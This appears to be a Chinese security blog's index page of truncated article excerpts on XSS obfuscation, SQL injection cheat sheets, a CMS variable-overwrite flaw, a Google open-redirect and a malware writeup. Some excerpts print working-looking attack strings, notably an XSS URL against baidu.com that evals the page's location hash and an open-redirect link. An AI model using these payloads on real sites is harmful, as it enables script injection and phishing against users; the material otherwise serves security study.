摘要:
Author: Cheng Peng Su (applesoup_at_gmail.com) Date: August 7, 2006 We've all known that the main problem of constructing XSS attacks is how to obfuscate malicious code. In the following paragraphs ... 阅读全文
只有注册用户登录后才能阅读该文。 阅读全文
摘要:
该cms的核心配置文件/include/common.inc.php有缺陷 -------------------------------------------- //23行开始 @extract($_POST, EXTR_OVERWRITE); @extract($_GET, EXTR_OVERWRITE); unset($_POST, $_GET); --------------------... 阅读全文
只有注册用户登录后才能阅读该文。 阅读全文
摘要:
About SQL Injection Cheat Sheet Currently only for MySQL and Microsoft SQL Server, some ORACLE and some PostgreSQL. Most of samples are not correct for every single situation. Most of the real world ... 阅读全文
摘要:
http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval('window.r=1;eval(unescape(location.hash.substr(1)))'):1);#alert%28%27www.safe3.cn%27%29 测试地址:运行 阅读全文
摘要:
Published: September 12, 2007 By Chema Alonso, Microsoft Security MVP See other Security MVP Article of the Month columns. Introduction This article describes how attackers take advantage of SQL I... 阅读全文
摘要:
javascript:R=0;%20x1=.1;%20y1=.05;%20x2=.25;%20y2=.24;%20x3=1.6;%20y3=.24;%20x4=300;%20y4=200;%20x5=300;%20y5=200;%20DI=document.images;%20DIL=DI.length;%20function%20A(){for(i=0;%20i-DIL;%20i++){DIS=... 阅读全文
摘要:
漏洞出处:GOOGLE图片搜索 漏洞文件:http://images.google.cn/imgres?imgurl=1.jpg&imgrefurl= 漏洞利用:http://images.google.cn/imgres?imgurl=1.jpg&imgrefurl=http://safelive.cn/ 阅读全文
摘要:
作者:清新阳光 ( http://hi.baidu.com/newcenturysun) 日期:2008/06/19 (转载请保留此声明) 这是一个具有多种传播功能和反... 阅读全文